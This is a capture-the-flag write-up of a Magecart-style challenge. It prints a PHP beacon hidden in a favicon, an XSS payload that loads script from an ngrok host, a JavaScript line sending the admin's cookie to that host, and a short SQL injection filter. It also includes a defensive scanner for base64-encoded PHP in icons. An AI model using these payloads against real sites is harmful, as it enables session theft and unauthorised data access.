# Level 4 - The Magician's Den

> One day, the admin of Apple Story Pte Ltd received an anonymous email.
>
> \===
>
> Dear admins of Apple Story, We are PALINDROME.
>
> We have taken control of your system and stolen your secret formula!
>
> Do not fear for we are only after the money.
>
> Pay us our demand and we will be gone.
>
> For starters, we have denied all controls from you.
>
> We demand a ransom of 1 BTC to be sent to 1BvBMSEYstWetqTFn5Au4m4GFg7xJaNVN2 by 31 Dec 2021.
>
> Do not contact the police or seek help.
>
> Failure to do so and the plant is gone.
>
> We planted a monitoring kit so do not test us.
>
> Remember 1 BTC by 31 Dec 2021 and we will be gone. Muahahahaha.
>
> Regards, PALINDROME
>
> \===
>
> Management have just one instruction. Retrieve the encryption key before the deadline and solve this.
>
> <http://wp6p6avs8yncf6wuvdwnpq8lfdhyjjds.ctf.sg:14719>
>
> Note: Payloads uploaded will be deleted every 30 minutes.

### Finding the Target Server

From the challenge name and this photo, we could gather that this challenge was inspired by Magecart!

![](https://3167364547-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MX1bWRlBzHpEPe1TYDD%2Fuploads%2Fgit-blob-1830708c54cb74c080c74986cc4f858868356194%2FScreenshot%202021-11-19%20at%208.06.30%20PM.png?alt=media)

We were also hinted to look into Magecart's [past TTPs](https://www.darkreading.com/attacks-breaches/magecart-how-its-attack-techniques-evolved). I initially thought of card skimming JavaScript, but after taking a look at the page contents, this seemed rather unlikely (the only JavaScript was for the countdown timer).

This bit about Favicons was quite interesting, though, so I decided to look into it.

![](https://3167364547-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MX1bWRlBzHpEPe1TYDD%2Fuploads%2Fgit-blob-103e1a3d29d9b05268b69fe14da2d771d2fb3c3f%2FScreenshot%202021-11-19%20at%208.10.46%20PM.png?alt=media)

It appears that the webpage's Favicon does indeed include some code!

![](https://3167364547-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MX1bWRlBzHpEPe1TYDD%2Fuploads%2Fgit-blob-6905215fcbfd3146659ebc0dd11d47989b514bc6%2F7ca9795e30414e18b9c16b8949f02c74.png?alt=media)

The base64 payload decodes to the following PHP snippet:

```php
// Beacon hidden in the favicon: POSTs a marker string to the attacker's collection endpoint
$ch=curl_init();
curl_setopt($ch,CURLOPT_URL,"http://s0pq6slfaunwbtmysg62yzmoddaw7ppj.ctf.sg:18926/xcvlosxgbtfcofovywbxdawregjbzqta.php");
curl_setopt($ch,CURLOPT_POST,1);
curl_setopt($ch,CURLOPT_POSTFIELDS,"14c4b06b824ec593239362517f538b29=Hi%20from%20scada");
$server_output=curl_exec($ch);
```
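Favicons with code smuggled inside them are a known Magecart trick, and the check for it is cheap. The scanner below is an added example, not part of the original writeup or challenge: it looks for long base64 runs in an image file, decodes them, and flags any that contain PHP-looking markers. The favicon bytes and the PHP snippet inside them are constructed for the demo.

```python
import base64
import re

# Constructed sample: a fake ICO-style header, then a base64 blob that decodes to
# a PHP beacon similar in shape to the one found in the challenge favicon.
PHP_SNIPPET = b'$ch=curl_init();curl_setopt($ch,CURLOPT_URL,"http://example.invalid/x.php");'
FAKE_FAVICON = (
    b"\x00\x00\x01\x00\x01\x00\x10\x10" + b"\x00" * 16
    + base64.b64encode(PHP_SNIPPET)
    + b"\x00" * 8
)

# A base64 run long enough to be worth decoding (short runs are common in image data).
B64_RE = re.compile(rb"[A-Za-z0-9+/]{40,}={0,2}")

# Strings that rarely occur in a genuine icon but are typical of PHP droppers/beacons.
PHP_MARKERS = (b"<?php", b"curl_init", b"curl_setopt", b"eval(",
               b"base64_decode", b"$_POST", b"$_GET")


def find_embedded_php(data: bytes):
    """Return a list of (offset, decoded_text) for base64 runs that decode to PHP-like code."""
    hits = []
    for match in B64_RE.finditer(data):
        blob = match.group(0)
        blob += b"=" * (-len(blob) % 4)  # restore padding if it was stripped
        try:
            decoded = base64.b64decode(blob, validate=False)
        except ValueError:
            continue  # not valid base64 after all
        if any(marker in decoded for marker in PHP_MARKERS):
            hits.append((match.start(), decoded.decode("latin-1")))
    return hits


def scan_file(path: str):
    """Convenience wrapper to scan a favicon on disk."""
    with open(path, "rb") as fh:
        return find_embedded_php(fh.read())


if __name__ == "__main__":
    for offset, code in find_embedded_php(FAKE_FAVICON):
        print(f"embedded PHP at offset {offset}: {code[:60]}...")
```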

We found a new endpoint, and we know that we can send POST requests to it!

### Authenticating as the Admin

Exploring a bit more, we can also find out the following:

1. When POST-ing data to the server, the data is saved to an HTML file.
2. `http://s0pq6slfaunwbtmysg62yzmoddaw7ppj.ctf.sg:18926/data.php` lists all the recent HTML files.
3. The files are read by the admin.
4. We can perform an XSS on the admin.

![](https://3167364547-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MX1bWRlBzHpEPe1TYDD%2Fuploads%2Fgit-blob-1517497738291ac35dcd5d89953460f6eb908d6f%2F36e6f00685104e69993835240f25d59a.png?alt=media)

I sent the following HTML payload:

```html
Hi from scada
<script src="https://bf25-115-66-195-39.ngrok.io/exploit.js"></script>
```

On the exploit server, the following cookie-stealing payload is hosted as `exploit.js`:

```javascript
document.location.href = "https://bf25-115-66-195-39.ngrok.io/?" + document.cookie;
```

This allows us to obtain the admin cookie.

### Getting the Flag

In the `robots.txt` file, we discover some interesting entries.

![](https://3167364547-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MX1bWRlBzHpEPe1TYDD%2Fuploads%2Fgit-blob-0ef53f46b85a60b72cea4c7b2f9d94ec6d56afae%2Fdd681de414c94edb80ba81fd4bc853ac.png?alt=media)

The `login.php` endpoint redirects to `landing_admin.php` once we have authenticated as the admin. We also learnt that we can set `?debug=TRUE`.

![](https://3167364547-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MX1bWRlBzHpEPe1TYDD%2Fuploads%2Fgit-blob-5dcbabd68010deeab38f0faa7e031b503e77a459%2F5d7bf7812d0a4de5ae5258056dee66b9.png?alt=media)

Here, we need to exploit an SQL injection to obtain the flag. The debug parameter lets us see the SQL errors. The catch is that the filter can only be 7 characters long, so we have to get creative.

I ended up with `filter='or'1'#`. No spaces are needed between the string literals, the string `'1'` evaluates to true in a boolean context, and the `#` comments out the rest of the query so it does not error.

![](https://3167364547-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MX1bWRlBzHpEPe1TYDD%2Fuploads%2Fgit-blob-6f0585583d206883f88d35960411bbdca7185c40%2Fcb977d0b27e74864b867b2a99f720931.png?alt=media)
